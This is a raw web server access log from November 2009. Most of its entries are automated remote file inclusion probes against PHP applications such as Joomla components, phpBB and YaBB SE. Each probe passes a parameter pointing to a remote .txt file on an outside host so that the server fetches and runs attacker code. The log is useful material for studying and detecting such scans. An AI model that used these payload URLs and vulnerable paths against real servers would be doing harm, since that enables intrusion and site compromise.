219.127.87.143 - - [01/Nov/2009:01:56:51 -0400] "GET /logs/contact.php?phpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
122.155.5.84 - - [01/Nov/2009:01:57:20 -0400] "GET /logs/error_log.Q109052200//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:57:20 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:57:20 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:01:57:32 -0400] "GET /logs/access_log.Q109062200//include/mail.inc.php?skin_board_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.126.218.14 - - [01/Nov/2009:01:57:47 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.126.218.14 - - [01/Nov/2009:01:57:47 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.218.14 - - [01/Nov/2009:01:57:47 -0400] "GET /logs/access_log.Q109071100%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.126.218.14 - - [01/Nov/2009:01:57:52 -0400] "GET /logs/access_log.Q109092600%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:58:13 -0400] "GET /logs/access_log.Q109071300%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:58:13 -0400] "GET /logs/access_log.Q109051800%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:59:24 -0400] "GET /logs/access_log.Q109060500////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.64.94.64 - - [01/Nov/2009:01:59:24 -0400] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:59:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.60.75.79 - - [01/Nov/2009:01:59:52 -0400] "GET /index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
188.60.75.79 - - [01/Nov/2009:01:59:52 -0400] "GET /logs/index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
188.60.75.79 - - [01/Nov/2009:01:59:52 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
114.4.8.14 - - [01/Nov/2009:01:00:41 -0500] "GET /logs/access_log.Q109060500////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.4.8.14 - - [01/Nov/2009:01:00:41 -0500] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:01:36 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:01:36 -0500] "GET /logs/error_log.Q109071700/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:01:36 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:01:36 -0500] "GET /logs/error_log.Q109052200/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:02:11 -0500] "GET /logs/access_log.Q109071300////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:02:11 -0500] "GET /logs/access_log.Q109051800////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.143.29.189 - - [01/Nov/2009:01:02:11 -0500] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:03:38 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:03:38 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:03:38 -0500] "GET /logs/access_log.Q109082500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:03:39 -0500] "GET /logs/access_log.Q109071500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:03:43 -0500] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:03:44 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:03:46 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:04:05 -0500] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:04:05 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:04:05 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:04:13 -0500] "GET /logs/access_log.Q109051800%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:04:13 -0500] "GET /logs/access_log.Q109071300%20%20////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:04:26 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.126.218.14 - - [01/Nov/2009:01:04:48 -0500] "GET /logs/access_log.Q109071100//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
75.126.218.14 - - [01/Nov/2009:01:04:48 -0500] "GET /logs/access_log.Q109092600//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://perl.fileave.com/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:05:50 -0500] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:05:50 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:05:53 -0500] "GET //skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:01:06:28 -0500] "GET /logs/access_log.Q109102100 HTTP/1.0" 200 4525561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.171.190.107 - - [01/Nov/2009:01:08:42 -0500] "GET /logs/access_log.Q109093000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:09:09 -0500] "GET /logs/access_log.Q109093000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.171.190.107 - - [01/Nov/2009:01:09:19 -0500] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:09:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.171.190.107 - - [01/Nov/2009:01:09:43 -0500] "GET /logs/access_log.Q109063000//skin/zero_vote/admin.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:09:44 -0500] "GET /logs/access_log.Q109082500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:01:09:45 -0500] "GET /logs/access_log.Q109071500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:14:28 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.63.193.55 - - [01/Nov/2009:01:15:17 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
222.73.17.7 - - [01/Nov/2009:01:15:30 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:30 -0500] "GET /logs/access_log.Q109081500%20%20/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:30 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /logs/access_log.Q109081500%20%20/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /logs/access_log.Q109081500/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:32 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:34 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:34 -0500] "GET /logs/access_log.Q109081500/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:15:34 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:16:12 -0500] "GET /logs/access_log.Q109060500////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.230.123.88 - - [01/Nov/2009:01:16:12 -0500] "GET /logs////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:15 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:15 -0500] "GET /logs/access_log.Q109081500/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:15 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:16 -0500] "GET /?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:16 -0500] "GET /logs/access_log.Q109081500/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:01:17:16 -0500] "GET /logs/?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:33 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:38 -0500] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:38 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:40 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:40 -0500] "GET /logs/access_log.Q109071600%20%20////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:17:40 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:18:44 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:18:44 -0500] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:18:44 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
220.181.7.115 - - [01/Nov/2009:01:18:54 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
58.230.123.88 - - [01/Nov/2009:01:18:59 -0500] "GET /logs/error_log.Q109071000////?path%5Bdocroot%5D=http://www.thaiantitobacco.com/lamb//copyright.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:19:35 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [01/Nov/2009:01:19:54 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [01/Nov/2009:01:19:54 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [01/Nov/2009:01:19:54 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [01/Nov/2009:01:19:54 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
123.125.66.127 - - [01/Nov/2009:01:20:04 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
219.127.87.143 - - [01/Nov/2009:01:20:28 -0500] "GET /?page=http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
219.127.87.143 - - [01/Nov/2009:01:20:29 -0500] "GET /logs/?page=http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 200 24198 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.65.200 - - [01/Nov/2009:01:20:41 -0500] "GET /logs/access_log.Q109071300 HTTP/1.1" 200 4718643 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.80.108.81 - - [01/Nov/2009:01:21:30 -0500] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:30 -0500] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:30 -0500] "GET /logs/access_log.Q109072200//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:37 -0500] "GET /logs/error_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.65.200 - - [01/Nov/2009:01:21:25 -0500] "GET /logs/access_log.Q109060600 HTTP/1.1" 200 2519002 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.80.108.81 - - [01/Nov/2009:01:21:42 -0500] "GET //contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:42 -0500] "GET /logs/access_log.Q109072200//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:43 -0500] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.80.108.81 - - [01/Nov/2009:01:21:51 -0500] "GET /logs/error_log.Q109052700//contrib/yabbse/poc.php?poc_root_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.218.116.132 - - [01/Nov/2009:01:22:23 -0500] "GET /logs/access_log.Q109071200 HTTP/1.0" 200 2162244 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.65.200 - - [01/Nov/2009:01:22:18 -0500] "GET /logs/access_log.Q109081100 HTTP/1.1" 200 5268662 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.222.131.59 - - [01/Nov/2009:01:23:45 -0500] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:45 -0500] "GET /logs/access_log.Q109091300%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:45 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:45 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:47 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:47 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:47 -0500] "GET /logs/access_log.Q109071400%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:23:47 -0500] "GET /logs/access_log.Q109091300%20%20/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:01:24:41 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.251.99.2 - - [01/Nov/2009:01:24:52 -0500] "GET /logs/access_log.Q109071600////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:24:52 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:01:24:52 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24205 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:33 -0500] "GET /errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:33 -0500] "GET /logs/access_log.Q109051700/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:33 -0500] "GET /logs/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:33 -0500] "GET /logs/access_log.Q109082500/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:25:39 -0500] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:25:39 -0500] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:25:40 -0500] "GET /logs/access_log.Q109071400/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:01:25:40 -0500] "GET /logs/access_log.Q109091300/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:58 -0500] "GET /errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:58 -0500] "GET /logs/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:58 -0500] "GET /logs/access_log.Q109051700/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:01:25:58 -0500] "GET /logs/access_log.Q109082500/errors.php?error=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
